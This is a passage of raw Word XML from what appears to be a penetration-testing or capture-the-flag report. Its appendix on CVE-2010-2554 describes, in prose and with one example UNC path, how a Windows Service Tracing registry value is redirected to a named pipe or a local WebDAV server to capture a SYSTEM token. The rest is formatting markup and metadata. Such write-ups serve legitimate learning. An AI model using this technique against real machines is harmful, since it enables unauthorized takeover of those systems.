        <w:t xml:space="preserve"> - Root flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3463FB07" w14:textId="77777777" w:rsidR="00F71FE2" w:rsidRPr="00CB3015" w:rsidRDefault="00F71FE2" w:rsidP="00F71FE2">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc169465164"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Appendix A - CVE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="7AA1F83B" w14:textId="77777777" w:rsidR="00F71FE2" w:rsidRDefault="00F71FE2" w:rsidP="00F71FE2">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc169465165"/>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2010-2554</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3D59AD8E" w14:textId="5E61590E" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00F71FE2" w:rsidP="00F71FE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An elevation of privilege vulnerability exists when Windows places incorrect access control lists (ACLs) on the registry keys for the Tracing Feature for Services. The vulnerability could allow an attacker to run code with elevated privileges. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Around 10 years ago, Cesar Cerrudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">found that it was possible to use the Service Tracing feature of Windows as a way of capturing a </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>SYSTEM</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> token using a named pipe. As long as you had the </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rStyle w:val="CodiceHTML"/>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>SeImpersonatePrivilege</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> privilege, you could then execute arbitrary code in the security context of this user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The idea is simple, you first have to start a local named pipe server. Then, instead of setting a simple directory path as the target log file’s folder in the registry, you can specify the path of this named pipe.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Y</w:t>
      </w:r>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ou need to know how the final log file path is calculated. That’s trivial, it’s a simple string concatenation: </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rStyle w:val="CodiceHTML"/>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>&lt;DIRECTORY&gt;\&lt;SERVICE_NAME&gt;.LOG</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, where </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rStyle w:val="CodiceHTML"/>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>&lt;DIRECTORY&gt;</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is read from the registry (</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rStyle w:val="CodiceHTML"/>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>FileDirectory</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="000311F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> value). </w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this exploit though, we specified the name of a pipe rather than a regular directory, by using a UNC path. On Windows, there are many ways to specify a path and this is only one of them but this post isn’t about that. Actually, UNC (Universal Naming Convention) is exactly what we need, but we need to use it a slightly differently.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNC paths are commonly used for accessing remote shares on a local network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There is a slight variant of this example. You can use a path such as </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>\\DUMMY@4444\FOO\BAR</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to access a remote share on an arbitrary port (4444 in this example) rather than the default TCP port 445. Although the difference in the path is small, the implications are huge. The most obvious one is that the SMB protocol is no longer used. Instead, the client uses an extended version of the HTTP protocol, which is called WebDAV (Web Distributed Authoring and Versioning).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On Windows, WebDAV is handled by the WebClient service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Although, WebDAV uses a completely different protocol, one thing remains: authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">So, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">this vulnearability can be exploited </w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a local WebDAV server and use such a path as the output directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Different kind of authentication </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">can be used. In case of NTLM authentication, it is required that </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>Identity</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is not set. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This means that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00D80DDA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can bypass the patch and get an impersonation token that we can use to execute arbitrary code in the context of </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rStyle w:val="CodiceHTML"/>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>NT AUTHORITY\SYSTEM</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodiceHTML"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F71FE2" w:rsidRPr="00F71F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00B03"/>
    <w:rsid w:val="0010351D"/>
    <w:rsid w:val="001409A8"/>
    <w:rsid w:val="00253185"/>
    <w:rsid w:val="002841EE"/>
    <w:rsid w:val="003E7890"/>
    <w:rsid w:val="004917A9"/>
    <w:rsid w:val="004B23E9"/>
    <w:rsid w:val="004B6CE4"/>
    <w:rsid w:val="004E245C"/>
    <w:rsid w:val="00507AF9"/>
    <w:rsid w:val="005347BB"/>
    <w:rsid w:val="005702DD"/>
    <w:rsid w:val="005D07C6"/>
    <w:rsid w:val="006D481D"/>
    <w:rsid w:val="006F4E0C"/>
    <w:rsid w:val="008224F8"/>
    <w:rsid w:val="008F0C16"/>
    <w:rsid w:val="00915D60"/>
    <w:rsid w:val="009A4998"/>
    <w:rsid w:val="00A84B06"/>
    <w:rsid w:val="00AC7714"/>
    <w:rsid w:val="00AE7EC9"/>
    <w:rsid w:val="00BC3B9E"/>
    <w:rsid w:val="00C62298"/>
    <w:rsid w:val="00CB3015"/>
    <w:rsid w:val="00CD62ED"/>
    <w:rsid w:val="00CE707F"/>
    <w:rsid w:val="00D265A3"/>
    <w:rsid w:val="00DF72E4"/>
    <w:rsid w:val="00E11AAF"/>
    <w:rsid w:val="00EE5300"/>
    <w:rsid w:val="00EF34C6"/>
    <w:rsid w:val="00F71FE2"/>
    <w:rsid w:val="00FC5FFC"/>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styleId="CodiceHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F71FE2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F71F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0.10.10.11:85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1054</Words>
  <Characters>6009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8</cp:revision>
  <cp:lastPrinted>2024-06-16T11:21:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-16T09:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-16T11:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>